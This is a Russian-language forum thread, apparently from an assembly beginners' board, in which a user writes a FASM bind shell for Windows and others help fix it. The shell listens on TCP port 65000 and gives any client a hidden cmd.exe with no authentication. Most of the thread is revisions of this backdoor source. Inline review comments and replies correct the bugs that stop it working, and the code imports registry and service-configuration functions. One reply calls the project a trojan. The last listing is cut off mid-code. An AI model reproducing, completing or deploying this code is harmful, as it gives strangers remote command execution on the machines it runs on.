Вот начал изучать сетевые сокеты Windows , у меня вопрос больше по синтаксису fasm'a щас , не хочет подцепляца макрос sizeof а мне нада передать размер структуры функции: Error: undefined symbol 'sizeof'. Instruction: pushd sizeof sock хотя макросы в инклюдах подключены Код (Text):
format PE GUI 4.0
entry Main
include 'win32a.inc'

section '.data' data readable writeable

wsadata   WSADATA
sock      sockaddr_in
hsocket   dd ?
my_socket dw 65535d        ; port in host byte order; sin_port expects network
                           ; (big-endian) order - 0FFFFh happens to be symmetric,
                           ; any other port number would need a byte swap first
ErrorCode db 260 dup(?)
Fmt       db '%x',0

section '.code' code readable executable

; Entry point: initialises Winsock, creates a TCP socket and binds it to
; port my_socket on every interface (sin_addr = 0 = INADDR_ANY), then exits.
proc Main
        invoke  WSAStartup,0202h,wsadata
        invoke  socket, AF_INET,SOCK_STREAM,0
        mov     [hsocket],eax                ; NOTE(review): never compared with INVALID_SOCKET
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0
        push    [my_socket]
        pop     [sock.sin_port]
        ; NOTE(review): this is the line the assembler rejects. fasm has no
        ; 'sizeof' operator; the struct macro from the includes defines a
        ; constant named sizeof.<STRUCT> for every structure, so the size of
        ; a sockaddr_in is spelled 'sizeof.sockaddr_in' (the type name, not
        ; the instance name 'sock'). 'bind' is also missing from the Ws2_32
        ; import list at the bottom, so the next error after fixing this one
        ; will be "undefined symbol 'bind'".
        invoke  bind,[hsocket],sock,sizeof sock
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Shows the last Win32 error code in a message box.
; NOTE(review): wsprintfA is handed the literal 0 instead of eax, so the box
; always shows 0; the documented call for Winsock errors is WSAGetLastError.
proc LastError
        invoke  GetLastError
        cinvoke wsprintfA,ErrorCode,Fmt,0
        invoke  MessageBoxA,0,ErrorCode,0,MB_ICONERROR
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        user,'USER32.DLL',\
        advapi,'ADVAPI32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  advapi,\
        RegOpenKeyExA,'RegOpenKeyExA',\
        RegSetValueExA,'RegSetValueExA',\
        RegCloseKey,'RegCloseKey'

import  kernel,\
        ExitProcess,'ExitProcess',\
        GetLastError,'GetLastError',\
        lstrlenA,'lstrlenA'

import  user,\
        MessageBoxA,'MessageBoxA',\
        wsprintfA,'wsprintfA'

; NOTE(review): bind is not imported here although Main calls it.
import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup'
Вот на этом месте компилятор пишет ошибку invoke bind,[hsocket],sock,sizeof sock
Ответы на любой из ваших вопросов есть в MSDN и в справке к компиляторам. Переводите хотя бы гуглом, если с буржуйским совсем туго. Конкретно по этой ошибке: в fasm нет оператора sizeof — макрос struct из инклюдов определяет для каждой структуры константу sizeof.<имя>, так что размер sockaddr_in передаётся как sizeof.sockaddr_in. Не моё дело, конечно, но так и WASM.BEGINNERS скоро не хватит.
Пишу bind shell на fasm. Вот на чем застрял не пойму что такое FIONBIO (это один из аргументов функции ioctlsocket) , если это константа то чему она равна или это что-то другое ? И еще как инициализировать локальные переменные на fasm? Код (Text):
format PE GUI 4.0
entry Main
include 'win32a.inc'

SOMAXCONN      = 7fffffffh
INVALID_SOCKET = -1h
; NOTE(review): FIONBIO is a plain constant from winsock2.h:
; _IOW('f',126,u_long) = 8004667Eh. ioctlsocket(s,FIONBIO,argp) reads a
; u_long through argp - non-zero switches the socket to non-blocking mode,
; zero back to blocking. The assembler does not know the name, so your
; includes evidently do not define it; add 'FIONBIO = 8004667Eh' here.

section '.data' data readable writeable

wsadata   WSADATA
sock      sockaddr_in
hsocket   dd ?
dwMode    dd ?
my_socket dw 65000d
ErrorCode db 260 dup(?)
Fmt       db '%x',0

section '.code' code readable executable

proc Main
        call    Shell
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Thread routine for one accepted connection (still a stub).
; NOTE(review): CreateThread hands the accepted socket to this routine as
; its single parameter; declare it ('proc BindCmd client:dword') and read
; it as [client]. Locals are declared between the header and the code:
;     proc BindCmd client:dword
;       locals
;         hPipe dd ?          ; '?' = uninitialised; set it with mov [hPipe],value
;         buf   db 1024 dup(?)
;       endl
; and are passed to APIs as 'addr hPipe', never as the bare name: they live
; at ebp-relative offsets and have no absolute address to push.
proc BindCmd
        ret
endp

; Binds port my_socket on every interface and accepts clients in a loop,
; starting a BindCmd thread for each. Never returns.
proc Shell
        invoke  WSAStartup,0202h,wsadata
        invoke  socket,AF_INET,SOCK_STREAM, 0
        mov     [hsocket],eax
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0
        mov     ax,[my_socket]
        xchg    ah,al                            ; host -> network byte order
        mov     [sock.sin_port],ax
        invoke  bind,[hsocket],sock,sizeof.sockaddr_in
        ; NOTE(review): 'mov dwMode,1' is immediate-to-immediate (dwMode
        ; without brackets is the address, a number); write 'mov [dwMode],1'.
        ; The bare 'dwMode' in the invoke below is right, though: ioctlsocket
        ; wants the address of the u_long and dwMode is a global.
        mov     dwMode,1
        ; NOTE(review): ioctlsocket is not in the Ws2_32 import list at the
        ; bottom, so this line also fails with "undefined symbol".
        invoke  ioctlsocket,[hsocket],FIONBIO,dwMode
        invoke  listen,[hsocket],SOMAXCONN
    @@:
        ; once FIONBIO works the listening socket is non-blocking: accept
        ; returns INVALID_SOCKET (WSAEWOULDBLOCK) when nobody is waiting,
        ; which is what the Sleep below polls for
        invoke  accept,[hsocket],sock,0
        cmp     eax,INVALID_SOCKET
        je      .ret
        mov     edx,eax
        invoke  CreateThread,0,0,BindCmd,edx,0,0
        invoke  CloseHandle,eax                  ; thread handle only; the thread keeps running
    .ret:
        invoke  Sleep, 1000
        jmp     @B
        ret
endp

; Shows the last Win32 error code in a message box.
; NOTE(review): prints the literal 0, not eax; use WSAGetLastError for Winsock.
proc LastError
        invoke  GetLastError
        cinvoke wsprintfA,ErrorCode,Fmt,0
        invoke  MessageBoxA,0,ErrorCode,0,MB_ICONERROR
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        user,'USER32.DLL',\
        advapi,'ADVAPI32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  advapi,\
        RegOpenKeyExA,'RegOpenKeyExA',\
        RegSetValueExA,'RegSetValueExA',\
        RegCloseKey,'RegCloseKey',\
        OpenSCManagerA,'OpenSCManagerA',\
        OpenServiceA,'OpenServiceA',\
        ChangeServiceConfigA,'ChangeServiceConfigA',\
        CloseServiceHandle,'CloseServiceHandle'

import  kernel,\
        ExitProcess,'ExitProcess',\
        GetLastError,'GetLastError',\
        lstrlenA,'lstrlenA',\
        GetModuleFileNameA,'GetModuleFileNameA',\
        lstrcatA,'lstrcatA',\
        lstrcpyA,'lstrcpyA',\
        CreateThread,'CreateThread',\
        CloseHandle,'CloseHandle',\
        Sleep,'Sleep'

import  user,\
        MessageBoxA,'MessageBoxA',\
        wsprintfA,'wsprintfA'

; NOTE(review): ioctlsocket is missing from this list (see Shell).
import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup',\
        bind,'bind',\
        listen,'listen',\
        accept,'accept'
варианты использования (или): - установить sdk и переносить, что нужно на fasm когда требуется - выкинуть fasm, установить c и sdk и ничего не переносить - пить яд
Ну ёк-макарёк, как инициализировать эти данные на fasm? Там пример в хелпе на Си же, и он мне не понятен. Помогите мне, пожалуйста, кому несложно. И как выделить место под локальный буфер?
Ну что же вы так упорно не хотите читать документацию? В пакете MASM32, например, есть папочка help. Там можно найти и как память выделить, и не только. Пишите по а) документации, б) книгам, в) статьям. Есть 2 варианта: а) отказаться от копипаста; б) отказаться от программирования (тем более всяких троянов). Выбор за вами! Локальный буфер в fasm проще всего объявить в стеке — `locals buffer db 1024 dup(?) endl` — и передавать в API через `addr buffer`; VirtualAlloc нужен для больших или долгоживущих блоков, а VirtualAllocEx — для выделения памяти в чужом процессе, здесь он ни к чему.
Инициализирую локальные переменные но программа отказываеца собираца , пигшет ошибки Код (Text):
format PE GUI 4.0
entry Main
include 'win32a.inc'

SOMAXCONN      = 7fffffffh
INVALID_SOCKET = -1h

section '.data' data readable writeable

mysocket      dw 65000d
szCommandLine db "cmd.exe",0
ErrorCode     db 260 dup(?)
Fmt           db '%x',0

struct SECURITY_ATTRIBUTES
  nLength              dd ?
  lpSecurityDescriptor dd ?
  bInheritHandle       dd ?
ends

; NOTE(review): shared by every BindCmd thread; with more than one client at
; a time the threads overwrite each other's startupinfo/processinfo.
sat         SECURITY_ATTRIBUTES
startupinfo STARTUPINFO
wsadata     WSADATA
sock        sockaddr_in
processinfo PROCESS_INFORMATION

section '.code' code readable executable

proc Main
        call    Shell
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Thread routine for one client: creates two pipes and starts cmd.exe with
; its standard handles redirected to them.
; NOTE(review): the accepted socket that CreateThread passes in is neither
; declared ('proc BindCmd client:dword') nor used yet.
proc BindCmd
  locals
        hiRead  dd ?
        hoRead  dd ?
        hiWrite dd ?
        hoWrite dd ?
  endl
        mov     [sat.nLength],sizeof.SECURITY_ATTRIBUTES
        mov     [sat.lpSecurityDescriptor],00h
        mov     [sat.bInheritHandle],01h         ; pipe ends inheritable by cmd.exe
        ; NOTE(review): this is the build error. hiRead etc. are locals, i.e.
        ; [ebp-N] slots without an absolute address, so the bare name cannot
        ; be pushed. Pass 'addr hiRead' (the invoke macro then emits lea/push);
        ; same for the other three. Bare names are only right for globals
        ; such as 'sat' and 'startupinfo' below.
        invoke  CreatePipe,hiRead,hiWrite,sat,00h
        invoke  CreatePipe,hoRead,hoWrite,sat,00h
        invoke  GetStartupInfoA,startupinfo
        mov     [startupinfo.cb],sizeof.STARTUPINFO
        mov     eax,[hoWrite]
        mov     [startupinfo.hStdOutput],eax
        mov     [startupinfo.hStdError],eax
        mov     eax,[hiRead]
        mov     [startupinfo.hStdInput],eax
        mov     [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
        mov     [startupinfo.wShowWindow],SW_HIDE
        invoke  CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo
        ; the child holds its own copies of these two ends now; drop ours
        invoke  CloseHandle,[hoWrite]
        invoke  CloseHandle,[hiRead]
        ; NOTE(review): no 'ret' before endp - fasm's endp does not emit one,
        ; so after CreateProcessA this thread runs straight into Shell below.
endp

; Creates the listening socket and accepts clients in a loop.
proc Shell
  locals
        hsocket dd ?
        dwMode  dd ?
  endl
        invoke  WSAStartup,0202h,wsadata
        invoke  socket,AF_INET,SOCK_STREAM, 0
        mov     [hsocket],eax
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0
        mov     ax,[mysocket]
        xchg    ah,al                            ; host -> network byte order
        mov     [sock.sin_port],ax
        invoke  bind,[hsocket],sock,sizeof.sockaddr_in
        mov     [dwMode],0001h
        ; NOTE(review): the command code 1 is not FIONBIO (8004667Eh), and
        ; [dwMode] passes the value 1 where ioctlsocket expects a pointer to
        ; the u_long; dwMode is a local here, so it must be 'addr dwMode'.
        invoke  ioctlsocket,[hsocket],1,[dwMode]
        invoke  listen,[hsocket],SOMAXCONN
    @@:
        invoke  accept,[hsocket],sock,0
        cmp     eax,INVALID_SOCKET
        je      .ret
        mov     edx,eax
        invoke  CreateThread,0,0,BindCmd,edx,0,0
        invoke  CloseHandle,eax
    .ret:
        invoke  Sleep, 1000
        jmp     @B
        ret
endp

; Shows the last Win32 error code in a message box (prints the literal 0, not eax).
proc LastError
        invoke  GetLastError
        cinvoke wsprintfA,ErrorCode,Fmt,0
        invoke  MessageBoxA,0,ErrorCode,0,MB_ICONERROR
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        user,'USER32.DLL',\
        advapi,'ADVAPI32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  advapi,\
        RegOpenKeyExA,'RegOpenKeyExA',\
        RegSetValueExA,'RegSetValueExA',\
        RegCloseKey,'RegCloseKey',\
        OpenSCManagerA,'OpenSCManagerA',\
        OpenServiceA,'OpenServiceA',\
        ChangeServiceConfigA,'ChangeServiceConfigA',\
        CloseServiceHandle,'CloseServiceHandle'

import  kernel,\
        ExitProcess,'ExitProcess',\
        GetLastError,'GetLastError',\
        lstrlenA,'lstrlenA',\
        GetModuleFileNameA,'GetModuleFileNameA',\
        lstrcatA,'lstrcatA',\
        lstrcpyA,'lstrcpyA',\
        CreateThread,'CreateThread',\
        CloseHandle,'CloseHandle',\
        Sleep,'Sleep',\
        CreatePipe,'CreatePipe',\
        GetStartupInfoA,'GetStartupInfoA',\
        CreateProcessA,'CreateProcessA'

import  user,\
        MessageBoxA,'MessageBoxA',\
        wsprintfA,'wsprintfA'

import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup',\
        bind,'bind',\
        listen,'listen',\
        accept,'accept',\
        ioctlsocket,'ioctlsocket'
«В фасме, чтобы получить адрес переменной, необходимо написать только имя» — это верно для глобальных данных. Сам знаешь адрес переменной, когда она локальная, то есть лежит где-то в стеке? Нет — он известен только относительно ebp, поэтому в invoke локальную переменную передают как `addr hiRead` (макрос сгенерирует lea/push). Либо, без addr, сделать их глобальными, как в комментарии ниже: Код (Text): locals hiRead dd ? ; Эти переменные в твоей программе не могут быть локальными. hoRead dd ? hiWrite dd ? hoWrite dd ? endl mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,hiRead,hiWrite,sat,00h invoke CreatePipe,hoRead,hoWrite,sat,00h
Спасибо. А почему моя программа не шлет в сокет приветственное сообщение ? Код (Text):
format PE GUI 4.0
entry Main
include 'win32a.inc'

SOMAXCONN      = 7fffffffh
INVALID_SOCKET = -1h

section '.data' data readable writeable

; NOTE(review): all of this is shared by every BindCmd thread, so two
; simultaneous clients trample each other's pipes and processinfo.
hsocket       dd ?
dwMode        dd ?
hiRead        dd ?
hoRead        dd ?
hiWrite       dd ?
hoWrite       dd ?
mysocket      dw 65000d
szCommandLine db 'cmd.exe',0
szBanner      db 'Welcome fragment!',13,10,0
ErrorCode     db 260 dup(?)
Fmt           db '%08Xh',0

struct SECURITY_ATTRIBUTES
  nLength              dd ?
  lpSecurityDescriptor dd ?
  bInheritHandle       dd ?
ends

sat         SECURITY_ATTRIBUTES
startupinfo STARTUPINFO
wsadata     WSADATA
sock        sockaddr_in
processinfo PROCESS_INFORMATION

section '.code' code readable executable

proc Main
        call    Shell
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Thread routine for one client: starts cmd.exe on two pipes, then tries to
; send the banner to the client.
proc BindCmd
        mov     [sat.nLength],sizeof.SECURITY_ATTRIBUTES
        mov     [sat.lpSecurityDescriptor],00h
        mov     [sat.bInheritHandle],01h
        invoke  CreatePipe,hiRead,hiWrite,sat,00h
        invoke  CreatePipe,hoRead,hoWrite,sat,00h
        invoke  GetStartupInfoA,startupinfo
        mov     [startupinfo.cb],sizeof.STARTUPINFO
        mov     eax,[hoWrite]
        mov     [startupinfo.hStdOutput],eax
        mov     [startupinfo.hStdError],eax
        mov     eax,[hiRead]
        mov     [startupinfo.hStdInput],eax
        mov     [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
        mov     [startupinfo.wShowWindow],SW_HIDE
        invoke  CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo
        invoke  CloseHandle,[hoWrite]
        invoke  CloseHandle,[hiRead]
        invoke  lstrlenA,szBanner
        ; NOTE(review): this is why nothing arrives. hsocket is the
        ; *listening* socket: bound and listening, but never connected to
        ; anyone, hence WSAENOTCONN (10057). The connected socket is the one
        ; accept returned in Shell, which CreateThread passed to this thread
        ; as its parameter. Declare it ('proc BindCmd client:dword') and
        ; send on [client] instead.
        invoke  send,[hsocket],szBanner,eax,0
        call    LastError
        ret
endp

; Listens on port mysocket and starts a BindCmd thread per accepted client.
proc Shell
        invoke  WSAStartup,0202h,wsadata
        invoke  socket,AF_INET,SOCK_STREAM, 0
        mov     [hsocket],eax
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0
        mov     ax,[mysocket]
        xchg    ah,al                            ; host -> network byte order
        mov     [sock.sin_port],ax
        invoke  bind,[hsocket],sock,sizeof.sockaddr_in
        invoke  listen,[hsocket],SOMAXCONN
    @@:
        invoke  accept,[hsocket],sock,0
        cmp     eax,INVALID_SOCKET
        je      .ret
        mov     edx,eax                          ; the connected socket: this is what the thread gets
        invoke  CreateThread,0,0,BindCmd,edx,0,0
        invoke  CloseHandle,eax
    .ret:
        invoke  Sleep, 1000
        jmp     @B
        ret
endp

; Shows the last error code as hex in a message box.
; NOTE(review): for Winsock failures the documented call is WSAGetLastError.
proc LastError
        invoke  GetLastError
        cinvoke wsprintfA,ErrorCode,Fmt,eax
        invoke  MessageBoxA,0,ErrorCode,0,MB_ICONERROR
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        user,'USER32.DLL',\
        advapi,'ADVAPI32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  advapi,\
        RegOpenKeyExA,'RegOpenKeyExA',\
        RegSetValueExA,'RegSetValueExA',\
        RegCloseKey,'RegCloseKey',\
        OpenSCManagerA,'OpenSCManagerA',\
        OpenServiceA,'OpenServiceA',\
        ChangeServiceConfigA,'ChangeServiceConfigA',\
        CloseServiceHandle,'CloseServiceHandle'

import  kernel,\
        ExitProcess,'ExitProcess',\
        GetLastError,'GetLastError',\
        lstrlenA,'lstrlenA',\
        GetModuleFileNameA,'GetModuleFileNameA',\
        lstrcatA,'lstrcatA',\
        lstrcpyA,'lstrcpyA',\
        CreateThread,'CreateThread',\
        CloseHandle,'CloseHandle',\
        Sleep,'Sleep',\
        CreatePipe,'CreatePipe',\
        GetStartupInfoA,'GetStartupInfoA',\
        CreateProcessA,'CreateProcessA'

import  user,\
        MessageBoxA,'MessageBoxA',\
        wsprintfA,'wsprintfA'

import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup',\
        bind,'bind',\
        listen,'listen',\
        accept,'accept',\
        ioctlsocket,'ioctlsocket',\
        send,'send'
GetLastError возвращает 00002749h WSAENOTCONN 10057 (0x2749) A request to send or receive data was disallowed because the socket is not connected and (when sending on a datagram socket using a sendto call) no address was supplied.
Помогите установить ошибку, я думаю она находится гдето после макроса .while Код (Text):
format PE GUI 4.0
entry Main
include 'win32ax.inc'

SOMAXCONN      = 7fffffffh
INVALID_SOCKET = -1h
FIONBIO        = 8004667Eh
STILL_ACTIVE   = 00000103h
SOCKET_ERROR   = -1
WSAEWOULDBLOCK = 10035d

; .while/.endw from the includes publish the loop labels as __WHILE/__ENDW
macro .break { jmp __ENDW }
macro .continue { jmp __WHILE }

section '.data' data readable writeable

; NOTE(review): all per-connection state is global and shared by every
; BindCmd thread - a second client corrupts the first session.
hsocket       dd ?
iMode         dd ?
bytes         dd ?
hiRead        dd ?
hoRead        dd ?
exitcode      dd ?
buffer        db 1024 dup(?)
available     dd ?
hiWrite       dd ?
hoWrite       dd ?
mysocket      dw 65000d
szCommandLine db 'cmd.exe',0
szBanner      db 'Welcome fragment!',13,10,0
ErrorCode     db 260 dup(?)
Fmt           db '%08Xh',0

struct SECURITY_ATTRIBUTES
  nLength              dd ?
  lpSecurityDescriptor dd ?
  bInheritHandle       dd ?
ends

sat         SECURITY_ATTRIBUTES
startupinfo STARTUPINFO
wsadata     WSADATA
sock        sockaddr_in
processinfo PROCESS_INFORMATION

section '.code' code readable executable

proc Main
        call    Shell
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Thread routine for one accepted connection (client = the connected
; socket): starts cmd.exe on two pipes and shuttles bytes between the pipes
; and the socket until the child exits or the client goes away.
proc BindCmd client:dword
        mov     [sat.nLength],sizeof.SECURITY_ATTRIBUTES
        mov     [sat.lpSecurityDescriptor],00h
        mov     [sat.bInheritHandle],01h
        invoke  CreatePipe,hiRead,hiWrite,sat,00h
        invoke  CreatePipe,hoRead,hoWrite,sat,00h
        invoke  GetStartupInfoA,startupinfo
        mov     [startupinfo.cb],sizeof.STARTUPINFO
        mov     eax,[hoWrite]
        mov     [startupinfo.hStdOutput],eax
        mov     [startupinfo.hStdError],eax
        mov     eax,[hiRead]
        mov     [startupinfo.hStdInput],eax
        mov     [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
        mov     [startupinfo.wShowWindow],SW_HIDE
        invoke  CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo
        invoke  CloseHandle,[hoWrite]
        invoke  CloseHandle,[hiRead]
        mov     [bytes],1
        ; NOTE(review): bug 1 - this switches the *listening* socket to
        ; non-blocking (Shell already did that); the client socket stays
        ; blocking, so the recv at the bottom of the loop stalls until the
        ; client sends something, and cmd.exe output is only forwarded once
        ; per received chunk (the prompt shows up one step late). Use [client].
        invoke  ioctlsocket,[hsocket],FIONBIO,bytes
        invoke  lstrlenA,szBanner
        invoke  send,[client],szBanner,eax,0
        .while TRUE
                invoke  Sleep,1
                invoke  GetExitCodeProcess,[processinfo.hProcess],exitcode
                .if [exitcode] <> STILL_ACTIVE
                        .break
                .endif
                invoke  PeekNamedPipe,[hoRead],buffer,1024,bytes,available,0
                .if [bytes] <> 0
                        .if [available] > 1024
                                .while [bytes] >= 1024
                                        invoke  Sleep,1
                                        invoke  ReadFile,[hoRead],buffer,1024,bytes, 0
                                        .if [bytes] <> 0
                                                ; NOTE(review): bug 2 - 'bytes' here is the
                                                ; ADDRESS of the variable, not its value, so the
                                                ; length handed to send is the data-section
                                                ; offset; write [bytes] (same on the second send).
                                                invoke  send,[client],buffer,bytes,0
                                        .endif
                                .endw
                        .else
                                invoke  ReadFile,[hoRead],buffer,1024,bytes,0
                                .if [bytes] <> 0
                                        invoke  send,[client],buffer,bytes,0
                                .endif
                        .endif
                .endif
            @@:
                invoke  recv,[client],buffer,1024,0
                ; NOTE(review): bug 3 - recv returns 0 when the peer closes the
                ; connection and sets no Winsock error for that, so
                ; WSAGetLastError reports the stale WSAEWOULDBLOCK of the
                ; previous poll and the loop continues forever instead of
                ; killing cmd.exe. Test eax = 0 on its own, before asking for
                ; the error code.
                .if eax = SOCKET_ERROR | eax = 0
                        invoke  WSAGetLastError
                        .if eax = WSAEWOULDBLOCK
                                .continue
                        .else
                                invoke  TerminateProcess,[processinfo.hProcess],0
                                .break
                        .endif
                .else
                        mov     edx,eax
                        invoke  WriteFile,[hiWrite],buffer,edx,bytes, 0
                .endif
        .endw
        invoke  CloseHandle,[hiWrite]
        invoke  CloseHandle,[hoRead]
        ; NOTE(review): processinfo.hProcess and .hThread are never closed.
        invoke  closesocket,[client]
        ret
endp

; Listens on port mysocket and starts a BindCmd thread per accepted client.
; NOTE(review): declared with a parameter, but Main uses a plain 'call Shell'
; with nothing pushed, so the generated 'ret 4' would unbalance Main's stack;
; harmless only because Shell never returns.
proc Shell lpParam
        invoke  WSAStartup,0202h,wsadata
        invoke  socket,AF_INET,SOCK_STREAM, 0
        mov     [hsocket],eax
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0
        mov     ax,[mysocket]
        xchg    ah,al                            ; host -> network byte order
        mov     [sock.sin_port],ax
        invoke  bind,[hsocket],sock,sizeof.sockaddr_in
        mov     [iMode],1
        invoke  ioctlsocket,[hsocket],FIONBIO,iMode
        invoke  listen,[hsocket],SOMAXCONN
    @@:
        invoke  accept,[hsocket],sock,0
        cmp     eax,INVALID_SOCKET
        je      .ret
        mov     edx,eax
        invoke  CreateThread,0,0,BindCmd,edx,0,0
        invoke  CloseHandle,eax
    .ret:
        invoke  Sleep, 1000
        jmp     @B
        ret
endp

; Shows the last error code as hex in a message box.
proc LastError
        invoke  GetLastError
        cinvoke wsprintfA,ErrorCode,Fmt,eax
        invoke  MessageBoxA,0,ErrorCode,0,MB_ICONERROR
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        user,'USER32.DLL',\
        advapi,'ADVAPI32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  advapi,\
        RegOpenKeyExA,'RegOpenKeyExA',\
        RegSetValueExA,'RegSetValueExA',\
        RegCloseKey,'RegCloseKey',\
        OpenSCManagerA,'OpenSCManagerA',\
        OpenServiceA,'OpenServiceA',\
        ChangeServiceConfigA,'ChangeServiceConfigA',\
        CloseServiceHandle,'CloseServiceHandle'

import  kernel,\
        ExitProcess,'ExitProcess',\
        GetLastError,'GetLastError',\
        lstrlenA,'lstrlenA',\
        GetModuleFileNameA,'GetModuleFileNameA',\
        lstrcatA,'lstrcatA',\
        lstrcpyA,'lstrcpyA',\
        CreateThread,'CreateThread',\
        CloseHandle,'CloseHandle',\
        Sleep,'Sleep',\
        CreatePipe,'CreatePipe',\
        GetStartupInfoA,'GetStartupInfoA',\
        CreateProcessA,'CreateProcessA',\
        GetExitCodeProcess,'GetExitCodeProcess',\
        PeekNamedPipe,'PeekNamedPipe',\
        ReadFile,'ReadFile',\
        TerminateProcess,'TerminateProcess',\
        WriteFile,'WriteFile'

import  user,\
        MessageBoxA,'MessageBoxA',\
        wsprintfA,'wsprintfA'

import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup',\
        bind,'bind',\
        listen,'listen',\
        accept,'accept',\
        ioctlsocket,'ioctlsocket',\
        send,'send',\
        recv,'recv',\
        WSAGetLastError,'WSAGetLastError',\
        closesocket,'closesocket'
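Вот код Bind shell cmd.exe на fasm. Подскажите пожалуйста, с cmd.exe он работает нормально а вот powershell не хочет, почему ? И почему он не завершает процесс когда из выходишь из шелла , можно что нибудь с этим зделать ? Помогите оптимизировать и доработать код пожалуйста. Код (Text):
; Bind shell: listens on TCP port 'mysocket' on every interface and gives
; each client an interactive cmd.exe whose standard handles are redirected
; through two anonymous pipes.
;
; NOTE(review): there is no authentication at all - whoever can reach the
; port gets a command prompt with the rights of the user running this
; binary. Run it only on lab machines you own, and prefer binding to one
; specific interface over INADDR_ANY.
;
; Changes against the previous revision (they answer the two questions):
;  - "does not kill cmd.exe when I leave the shell": a peer that closes the
;    connection makes recv return 0 *without* setting a Winsock error; the
;    old code called WSAGetLastError anyway, saw the stale WSAEWOULDBLOCK
;    from the previous poll and kept looping. recv = 0 is now handled first.
;  - both ends of both pipes were inheritable, so every cmd.exe also got a
;    copy of our write end of its stdin and could never see EOF on it; the
;    two parent-side ends now have the inherit flag cleared.
;  - pipes, STARTUPINFO and PROCESS_INFORMATION are locals: as globals,
;    concurrent clients overwrote each other's processinfo and polled or
;    killed the wrong child.
;  - the child's process/thread handles are closed (they leaked), pending
;    output is flushed before the exit check, bind/listen failures end the
;    accept loop, unused imports are gone.
;  - powershell: nothing here is cmd-specific; the likely cause is that
;    powershell.exe does not take commands from a redirected stdin by
;    default. Try 'powershell.exe -NoLogo -NoProfile -Command -' (reads the
;    script from stdin) - not verified here.
format PE GUI 4.0
entry Main
include 'win32ax.inc'

SOMAXCONN           = 7fffffffh
INVALID_SOCKET      = -1h
FIONBIO             = 8004667Eh
STILL_ACTIVE        = 00000103h
SOCKET_ERROR        = -1
WSAEWOULDBLOCK      = 10035d
HANDLE_FLAG_INHERIT = 1
BUFFER_SIZE         = 1024

; .while/.endw from the includes publish the loop labels as __WHILE/__ENDW
macro .break    { jmp __ENDW }
macro .continue { jmp __WHILE }

section '.data' data readable writeable

mysocket      dw 65000d                  ; listening port, host byte order
szCommandLine db 'cmd.exe',0
szBanner      db 'Welcome fragment!',13,10,0

struct SECURITY_ATTRIBUTES
  nLength              dd ?
  lpSecurityDescriptor dd ?
  bInheritHandle       dd ?
ends

wsadata WSADATA
sock    sockaddr_in                      ; only touched by the accept thread (Shell)

section '.code' code readable executable

; Entry point: runs the accept loop; cleans up Winsock if it ever returns.
proc Main
        call    Shell
        invoke  WSACleanup
        invoke  ExitProcess,0
endp

; Thread routine for one accepted connection. CreateThread passes the
; connected socket as the single parameter. Starts cmd.exe with its std
; handles on two pipes and copies bytes socket->stdin and stdout->socket
; until the client hangs up (cmd.exe is then killed) or cmd.exe exits on
; its own. Always returns 0.
proc BindCmd client:dword
  locals
        sat         SECURITY_ATTRIBUTES
        startupinfo STARTUPINFO
        processinfo PROCESS_INFORMATION
        hiRead      dd ?                 ; child's stdin (read end)
        hiWrite     dd ?                 ; ours: write into child's stdin
        hoRead      dd ?                 ; ours: read child's stdout/stderr
        hoWrite     dd ?                 ; child's stdout/stderr (write end)
        bytes       dd ?
        available   dd ?
        exitcode    dd ?
        nonblock    dd ?
        buffer      db BUFFER_SIZE dup(?)
  endl
        ; inheritable pipe ends so the child can use them as its std handles
        mov     [sat.nLength],sizeof.SECURITY_ATTRIBUTES
        mov     [sat.lpSecurityDescriptor],0
        mov     [sat.bInheritHandle],TRUE
        invoke  CreatePipe,addr hiRead,addr hiWrite,addr sat,0
        invoke  CreatePipe,addr hoRead,addr hoWrite,addr sat,0
        ; CreatePipe made *both* ends inheritable. The child must not get the
        ; two we keep: its own copy of hiWrite would hold its stdin open after
        ; we close ours, and a concurrently started child would inherit the
        ; handles of this session as well.
        invoke  SetHandleInformation,[hiWrite],HANDLE_FLAG_INHERIT,0
        invoke  SetHandleInformation,[hoRead],HANDLE_FLAG_INHERIT,0

        invoke  GetStartupInfoA,addr startupinfo
        mov     [startupinfo.cb],sizeof.STARTUPINFO
        mov     eax,[hoWrite]
        mov     [startupinfo.hStdOutput],eax
        mov     [startupinfo.hStdError],eax
        mov     eax,[hiRead]
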